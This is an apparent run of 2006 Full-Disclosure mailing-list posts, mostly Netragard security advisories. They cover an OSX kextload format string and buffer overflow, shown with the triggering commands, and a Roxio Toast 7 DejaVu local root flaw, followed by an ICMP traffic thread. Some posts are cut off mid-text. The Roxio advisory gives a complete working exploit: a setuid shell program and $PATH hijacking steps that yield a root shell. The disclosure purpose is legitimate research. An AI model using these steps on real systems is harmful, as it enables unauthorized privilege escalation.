found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... (no debugging symbols found)...(no debugging symbols found)... Program received signal SIGSEGV, Segmentation fault. warning: Hit heuristic-fence-post without finding warning: enclosing function for address 0x4141414141414140 This warning occurs if you are debugging a function without any symbols (for example, in a stripped executable). In that case, you may wish to increase the size of the search with the `set heuristic- fence-post' command. Otherwise, you told GDB there was a function where there isn't one, or (more likely) you have encountered a bug in GDB. 0x4141414141414140 in ?? () [Proof of Concept] - -- Undisclosed. [Vendor Status] - -- HP was contacted and a patch has been created. [ For more information please visit http://www.netragard.com ] [Disclaimer] - -http://www.netragard.com-
[Full-disclosure] [NETRAGARD-20060822 SECURITY ADVISORY] [ APPLE COMPUTER CORPORATION KEXTLOAD VULNERABILITY + ROXIO TOAST TITANUM 7 HELPER APP - LOCAL ROOT COMROMISE]
-BEGIN PGP SIGNED MESSAGE- Hash: SHA1 Netragard, L.L.C Advisory* *** ~ Strategic Reconnaissance Team ~ ~ http://www.netragard.com -- We make I.T. Safe. [About Netragard] - -- Netragard is a unique I.T. Security company whose services are fortified by continual vulnerability research and development. This ongoing research, which is performed by our Strategic Reconnaissance Team, specifically focuses on Operating Systems, Software Products and Web Applications commonly used by businesses internationally. We apply the knowledge gained by performing this research to our professional security services. This in turn enables us to produce high quality deliverables that are the product of talented security professionals and not those of automated scanners and tools. This advisory is the product of research done by the Strategic Reconnaissance Team. [Official URL] - -- http://www.netragard.com/pdfs/research/apple-kext-tools-20060822.txt [Advisory Information] - -- Contact : Adriel T. Desautels Advisory ID : NETRAGARD-20060822 Product Name: Apple OSX Product Version : ALL Helper Application : Roxio Toast 7 Titanium Vendor Name : Apple Computer Corporation Type of Vulnerability : Local Root Compromise (via kextload) Effort : Easy Operating System: OSX - -- Other : A vulnerability exists in OSX kexload program ~ which affects the security of Roxio Toast 7 and may affect other applications. This advisory contains two vulnerabilities in the kext load program: 1-) Format String Vulnerability 2-) Buffer Overflow Vulnerability [Product Description] - -- Toast 7 is the best way to save, share and enjoy a lifetime of digital music, movies and photos on CD and DVD. Burn large files across multiple discs; compress and copy DVD movies; add over 50 hours of music to an audio DVD with on-screen TV menus, shuffle play, and rich Dolby Digital sound; burn DivX files into DVDs. Do it all with the fastest and most reliable burning software for the Mac OS - Toast. - --http://www.roxio.com-- [Technical Summary] - -- Roxio toast executes the kextload command with root privileges. The kextload command contains two vulnerabilities which can be exploited by a local user to gain local root access to the system. This advisory outlines both issues. The kextload program is used to explicitly load kernel extensions (kexts), validate them to see that they can be loaded by other mechanisms, such as kextd(8), and to generate symbol files for debugging the kext in a running ker-nel. In order to load a kext into the kernel kextload must be invoked as the superuser; for all other uses it can be invoked by any user. !!Important Note: A user requires root to run kextload properly or!! !!kextload needs to be run by a helper application !! !!with root privileges. !! [Technical Details] - -- 1-) kextload format string vulnerability. Executing sudo kextload %x.%x.%x.%x.%x.%x demonstrates the vulnerability. The code which enables this format string vulnerability can be found in prelink.c and reads as fprintf(stderr, kext_path); netragard-test$ sudo kextload %x.%x.%x.%x.%x.%x kextload: /Users/test/90b4b6ca.1c.69737473.65206578.68206275.6e646c65:\ no such bundle file exists can't add kernel extension %x.%x.%x.%x.%x.%x (file access/permissions\ ) (run kextload on this kext with -t for diagnostic output) 2-) Buffer Overflow Vulnerability Executing kextload `perl -e 'print A x 1022'` causes a buffer overflow. We can see that critical memory segments have been overwritten by A in the example below. (A is represented as 0x41) (gdb) r `perl -e 'print A x 1023'` Starting program: /sbin/kextload `perl -e 'print A x 1023'` memory allocation or string conversion error Program exited with code 01. (gdb) r `perl -e 'print A x 1022'` Starting program: /sbin/kextload `perl -e 'print A x 1022'` Program received signal EXC_BAD_ACCESS, Could not
[Full-disclosure] NETRAGARD-20060624 SECURITY ADVISORY] [ROXIO TOAST 7 TITANIUM - LOCAL ROOT COMPROMISE ]
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
**
Netragard, L.L.C. --Vulnerability Research and Exploitation Team
www.netragard.com
[Advisory Information]
- --
Contact: : Adriel T. Desautels
Advisory ID: NETRAGARD-20060624
Product Name : Roxio Toast
Product Version: 7 Titanium
Vendor Name: Roxio
Type of Vulnerability : Local Root Compromise
Effort : Easy
Operating System : OSX
Other : Insecure usage of $PATH
[Product Description]
- --
Toast 7 is the best way to save, share and enjoy a lifetime of digital
music, movies and photos on CD and DVD. Burn large files across
multiple discs; compress and copy DVD movies; add over 50 hours of
music to an audio DVD with on-screen TV menus, shuffle play, and rich
Dolby Digital sound; burn DivX files into DVDs. Do it all with the
fastest and most reliable burning software for the Mac OS - Toast.
- --http://www.roxio.com--
[Technical Summary]
- --
Doing a default installation of Roxio Toast 7 Titanium also installs
DejaVu which is used for backups. DejaVu uses a control panel helper
application which makes isecure system() calls. More specifically,
an attacker can exploit these system() calls using the user controlled
environment variable named $PATH and gain root access to the system.
[Technical Details]
- --
This was tested using a configured version of Roxio Toast 7 Titanium.
Roxio 7 Toast contains locally exploitable vulnerabilities due to
insecure system() by calls by suid binaries which use the users $PATH
environment variable.
The following shows the DejaVu suid binaries:
netragard-test-1$ find . -perm -4000
./DejaVu.prefPane/Contents/Resources/abort_backup
./DejaVu.prefPane/Contents/Resources/archive_table
./DejaVu.prefPane/Contents/Resources/install_crontab
./DejaVu.prefPane/Contents/Resources/install_scripts
./DejaVu.prefPane/Contents/Resources/manual_backup
./DejaVu.prefPane/Contents/Resources/remove_scripts
1-Exploitation is trivial. A user must first create small program such
as the one demonstrated by simple.c below.
netragard-test-1$ cat simple.c
main()
{
seteuid(0);
setuid(0);
setegid(0);
setgid(0);
system(/bin/sh -i);
}
2-Once the user has created the program, the user must comple the
program, copy the program to replace rm, mv and cat, and insert it
into the $PATH variable.
netragard-test-1$cc -o chmod simple.c
netragard-test-1$cp chmod /tmp/rm
netragard-test-1$cp chmod /tmp/mv
netragard-test-1$cp chmod /tmp/cat
netragard-test-1$export PATH=/tmp/:$PATH
3-Once the user has finished with step 2, the user must then launch
the System Preferences control pannel.
netragard-test-1$/Applications/System\
Preferences.app/Contents/MacOS/System\ Preferences
4-After the user has launched the Systems Preferences helper
application, a GUI window should display. From that window click on
Deja Vu located in the other section. From there create a manual
backup and then click the backup button. At that point you should be
presented with a root shell prompt:
sh: no job control in this shell
sh-2.05b# id
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm),
79(appserverusr), 80(admin)
[Proof Of Concept]
- --
Successful Created and Functional
[Vendor Status]
- --
Vendor contacted and notified of the issue.
Vendor Comment:
Deja Vu, the affected component of Roxio Toast, is bundled into Roxio
Toast and is third party software. Deva Vu is authored by Propaganda
Productions and not Sonic.
[About Netragard]
- --
Netragard offers specialized application and network security services
which enable its clients to take a proactive security stance. Each of
our services is driven by security professionals who specialize in
specific areas of Information Security. This specialized focus
differentiates Netragard from the competition by enabling Netragard
to produce deliverables which are the product of skilled security
professionals and not the product of automated tools and scripts.
[ For more information please visit http://www.netragard.com ]
[Disclaimer]
- -http://www.netragard.com-
Netragard, L.L.C. assumes no liability for the use of the information
provided in this advisory. This advisory was released in an effort to
help the I.T. community protect themselves against a potentially
Re: [Full-disclosure] Re: ICMP DestinationUnreachable Port Unreachable
Fetch, I had already considered that actually. I found that it was just back scatter though. Someone must have been doing something naughty and I caught a little bit of the noise. Never the less, weird payloads... but nothing for me to be concerned about. Fetch, Brandon wrote: Isn't there a new Trojan that's using ICMP to send back it's pilfered data? It's encrypted (if I remember correctly) so no clear-text reading of what's sent and that may explain why you're seeing the random data. The padding of the same characters in individual packets may designate start/stop points in the transmission segments. Just my $.02... Brandon -Original Message- From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Adriel T. Desautels Sent: Wednesday, August 16, 2006 10:30 AM To: Adriel T. Desautels Cc: full-disclosure@lists.grok.org.uk; [EMAIL PROTECTED] Subject: Re: [Full-disclosure] Re: ICMP DestinationUnreachable Port Unreachable Also, I failed to mention that they came in bursts of 3 every 5 minutes on the dot. Adriel T. Desautels wrote: Well, After over 100,000 alerts each with very different payloads the traffic stopped. I do have a list of all of the dropped packets from my firewall as well and it appears that it was hitting 3 IP addresses which are public facing, not just one. The weird part, is that two of those three aren't even live. So I think that this may have been noise from a different attack... I'd be very interested in decoding the payloads for some of these. Anyone here have any tools to do such a decode? I'd rather not do it manual if at all possible. [EMAIL PROTECTED] wrote: On Wed, 16 Aug 2006 12:33:13 BST, Barrie Dempster said: Although the port 0 in this case is a red herring and irrelevant. Port 0 itself when used with TCP/UDP (not ICMP!) can actually be used on the Internet. A while back I modified netcat and my linux kernel so that it would allow usage of port 0 and was able to connect to a remote machine via TCP with that port and communicate fine. Of course, the poor security geek who see a TCP SYN from port 0 to port 0, and then a SYN+ACK reply back, will be going WTF??!? for the rest of the day. :) (Another good one to induce head-scratching is anything that does RFC1644-style T/TCP. Anytime you see a packet go by in one direction with SYN/FIN *and* data, and the reply has SYN/ACK/FIN and data.. ;) data on it... ;) ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ -- Regards, Netragard Vulnerability Research Team advisories at netragard dot com http://www.netragard.com - We make I.T. Secure BullGuard Anti-virus has scanned this e-mail and found it clean. Try BullGuard for free: www.bullguard.com ___ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
